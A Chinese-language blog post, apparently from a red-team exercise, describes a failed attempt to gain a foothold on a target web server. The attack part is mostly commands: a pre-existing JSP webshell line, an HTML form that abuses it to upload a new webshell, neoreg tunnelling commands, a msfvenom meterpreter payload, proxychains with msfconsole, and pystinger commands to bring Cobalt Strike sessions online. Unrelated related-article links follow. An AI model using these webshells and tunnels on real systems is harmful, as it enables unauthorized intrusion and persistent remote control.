记一次失败的打点

简介: 记一次失败的打点

背景


在某次攻防演练的晚上,大佬给我一个网站,说有一个RCE漏洞打一下试试,抱着试试就逝世的心态,进行了打点行动。


上传webshell


在web目录发现了一个已存在木马xx.jsp


<%if(request.getParameter("f".getBytes());%>< a href="One_OK"></ a>

利用已经存在的上传后门,构建一个html表单来上传我们的自己木马


<form action="http://xx.x.x.x:8080/scdc/xx.jsp?f=fuckjp.jsp" method="post">      <textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>    <input type=submit value="提交">  </form>

目标不出网,无法外联


neoreg


还原大致流程


生成neoreg


py -2 neoreg.py generate -k password


上传&验证


py -2 neoreg.py -k password -u http://192.168.11.132/3.php`

msf上线


msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=9001 -f exe -o reverse.exe

gedit /etc/proxychains4.conf


bd96902dccc9a0c18951361d921ad0be_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



proxychains4 msfconsole


97ab06f717b7f44c95119465262494fe_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


0458455f8bbc5b2342e6870ddcfb0b53_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


CS上线

pystinger


蚁剑上传proxy.phpstinger_server.exe并执行  start stinger_server.exe



攻击机执行


stinger_client.exe -w http://192.168.11.132/proxy.php -l 127.0.0.1 -p 60000


9013c3ca539d454049c855ae346f3ad2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


设置监听


2ea055c423a37255c418e141845493cf_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


上线


2ed2eaf610386f206137f593df9085cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



结束语


最后不幸被蓝队发现,痛失权限,打点失败。


相关文章
|
11月前
|
负载均衡 算法 应用服务中间件
5大负载均衡算法及原理,图解易懂!
本文详细介绍负载均衡的5大核心算法:轮询、加权轮询、随机、最少连接和源地址散列,帮助你深入理解分布式架构中的关键技术。关注【mikechen的互联网架构】,10年+BAT架构经验倾囊相授。
5大负载均衡算法及原理,图解易懂!
|
开发者
数据通信技术基础|学习笔记
快速学习数据通信技术基础
312 0
数据通信技术基础|学习笔记
|
7天前
|
存储 弹性计算 人工智能
【2025云栖精华内容】 打造持续领先,全球覆盖的澎湃算力底座——通用计算产品发布与行业实践专场回顾
2025年9月24日,阿里云弹性计算团队多位产品、技术专家及服务器团队技术专家共同在【2025云栖大会】现场带来了《通用计算产品发布与行业实践》的专场论坛,本论坛聚焦弹性计算多款通用算力产品发布。同时,ECS云服务器安全能力、资源售卖模式、计算AI助手等用户体验关键环节也宣布升级,让用云更简单、更智能。海尔三翼鸟云服务负责人刘建锋先生作为特邀嘉宾,莅临现场分享了关于阿里云ECS g9i推动AIoT平台的场景落地实践。
【2025云栖精华内容】 打造持续领先,全球覆盖的澎湃算力底座——通用计算产品发布与行业实践专场回顾
|
1天前
|
弹性计算 人工智能 安全
云上十五年——「弹性计算十五周年」系列客户故事(第二期)
阿里云弹性计算十五年深耕,以第九代ECS g9i实例引领算力革新。携手海尔三翼鸟、小鹏汽车、微帧科技等企业,实现性能跃升与成本优化,赋能AI、物联网、智能驾驶等前沿场景,共绘云端增长新图景。
|
6天前
|
人工智能 自然语言处理 自动驾驶
关于举办首届全国大学生“启真问智”人工智能模型&智能体大赛决赛的通知
关于举办首届全国大学生“启真问智”人工智能模型&智能体大赛决赛的通知
|
6天前
|
云安全 人工智能 自然语言处理
阿里云x硅基流动:AI安全护栏助力构建可信模型生态
阿里云AI安全护栏:大模型的“智能过滤系统”。
|
Linux 虚拟化 iOS开发
VMware Workstation Pro 25H2 for Windows & Linux - 领先的免费桌面虚拟化软件
VMware Workstation Pro 25H2 for Windows & Linux - 领先的免费桌面虚拟化软件
1104 4
|
9天前
|
存储 机器学习/深度学习 人工智能
大模型微调技术:LoRA原理与实践
本文深入解析大语言模型微调中的关键技术——低秩自适应(LoRA)。通过分析全参数微调的计算瓶颈,详细阐述LoRA的数学原理、实现机制和优势特点。文章包含完整的PyTorch实现代码、性能对比实验以及实际应用场景,为开发者提供高效微调大模型的实践指南。
703 2
|
7天前
|
编解码 自然语言处理 文字识别
Qwen3-VL再添丁!4B/8B Dense模型开源,更轻量,仍强大
凌晨,Qwen3-VL系列再添新成员——Dense架构的Qwen3-VL-8B、Qwen3-VL-4B 模型,本地部署友好,并完整保留了Qwen3-VL的全部表现,评测指标表现优秀。
567 7
Qwen3-VL再添丁!4B/8B Dense模型开源,更轻量,仍强大